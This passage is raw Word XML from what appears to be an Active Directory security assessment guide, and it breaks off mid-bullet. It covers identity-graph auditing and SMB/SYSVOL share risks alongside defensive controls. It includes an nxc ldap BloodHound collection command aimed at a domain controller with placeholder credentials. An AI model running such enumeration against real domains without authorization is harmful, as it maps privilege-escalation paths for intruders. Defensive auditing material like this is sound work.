    <w:p w14:paraId="06C5B9E8" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRDefault="00681BC3" w:rsidP="00681BC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6257F4" w14:textId="6FE03107" w:rsidR="00BE0FA4" w:rsidRPr="00681BC3" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Automated FICAM Object Graph Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B148F" w14:textId="07ED0AC5" w:rsidR="00BE0FA4" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Extract the complete digital identity topology to reveal non-conforming privilege pathways (Shadow AD Admin relationships).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13371EB9" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRPr="00676591" w:rsidRDefault="00681BC3" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7211F320" w14:textId="69821B6A" w:rsidR="006D3130" w:rsidRPr="009270EB" w:rsidRDefault="00BE0FA4" w:rsidP="00681BC3">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034C26C0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35A8F4EF" w14:textId="77777777" w:rsidR="006D3130" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CB76310" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRPr="00681BC3" w:rsidRDefault="00681BC3" w:rsidP="00681BC3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># Gather BloodHound telemetry utilizing existing Kerberos Cache or cleartext credentials</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">nxc ldap </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DC_IP&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'identity_auditor'</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'TargetPass123'</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--bloodhound</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--collection</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">All </w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="660066"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--dns-server</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00681BC3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DC_IP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FEF8848" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130" w:rsidP="00681BC3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="113D271B" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45766796" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">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Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120E5636" w14:textId="1A83984C" w:rsidR="00BE0FA4" w:rsidRPr="00676591" w:rsidRDefault="00BE0FA4" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deploy BloodHound Enterprise or continuous ACL auditing tools. Implement Tiered Administration models (Tiers 0/1/2) to isolate Identity Admins from workstation compromises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFDA326" w14:textId="77777777" w:rsidR="00681BC3" w:rsidRDefault="00681BC3" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5567AA33" w14:textId="4997C8C2" w:rsidR="00BE0FA4" w:rsidRPr="00294E91" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00294E91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Module 2: Credential Store and Trust Assessment (SMB / RPC Shares)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F2E790" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">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Offensive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4957739B" w14:textId="1E45C713" w:rsidR="00BE0FA4" w:rsidRPr="00AF0660" w:rsidRDefault="00BE0FA4" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inspect shared infrastructure resources for plaintext secrets, cryptographic deployment errors and/or misconfigurations, and legacy protocol configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC9FB3" w14:textId="77777777" w:rsidR="00AF0660" w:rsidRPr="00676591" w:rsidRDefault="00AF0660" w:rsidP="00AF0660">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D486DA6" w14:textId="77777777" w:rsidR="009270EB" w:rsidRPr="009270EB" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">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Defensive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67182FB9" w14:textId="027C1543" w:rsidR="00BE0FA4" w:rsidRPr="00676591" w:rsidRDefault="00BE0FA4" w:rsidP="009270EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Eliminate legacy SMBv1 protocols, enforce SMB Signing/Encryption packet protections, and sanitize the </w:t>
      </w:r>
      <w:r w:rsidRPr="009270EB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00676591">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> share from legacy configuration items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1B07DB" w14:textId="488BAC89" w:rsidR="00BE0FA4" w:rsidRPr="00AF0660" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Technical Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51310847" w14:textId="2371EB44" w:rsidR="00BE0FA4" w:rsidRPr="00AF0660" w:rsidRDefault="00BE0FA4" w:rsidP="00BE0FA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Security Assertion of Identity Shares (SMB Share Audit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5161FA68" w14:textId="4A5ACCB3" w:rsidR="00AF0660" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Evaluating the visibility and access parameters of directory department endpoints means analyzing how an identity infrastructure exposes network file shares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A8FB4" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0631C601" w14:textId="106714F8" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In an Active Directory (AD) environment, Domain Controllers (DCs) function as identity endpoints. They natively host shares to distribute policies, but they frequently accumulate misconfigured custom shares created by various departments (e.g., Finance, HR, IT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86C6D0" w14:textId="374F6051"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The Role of Default Directory Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504FF250" w14:textId="16280884"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Every Domain Controller automatically hosts two critical shares required for the domain to properly function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B6CC1E" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NETLOGON</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Contains logon scripts and administrative tools used by client machines during authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A603F5" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E4CE92" w14:textId="47F4B454" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Stores the actual Group Policy Objects (GPOs), scripts, and templates that configure every machine and user in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7357C8C5" w14:textId="0972E054"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The Fundamental Security Risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6AEA3" w14:textId="04F74706" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By design, every authenticated user (and computer account) in an Active Directory forest must have Read access to </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NETLOGON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Because containment is wide open by default, any compromise of a single low-privileged endpoint allows an attacker to search the entire repository for structural or architectural vulnerabilities or exposed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B673CB3" w14:textId="7447580A"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Departmental Endpoint Proliferation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349AD1D6" w14:textId="3248D63D" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Security degradation typically occurs when IT or department administrators spin up custom shares on directory endpoints or dedicated department file servers that are linked directly to the central identity architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C6753" w14:textId="2F614715" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Over-Privileged ACLs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shares intended for a small group (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>\\Server\HR_Reviews</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) are mistakenly assigned permissions like </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Everyone: Read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Authenticated Users: Change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8CDDE" w14:textId="3516FB0C" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
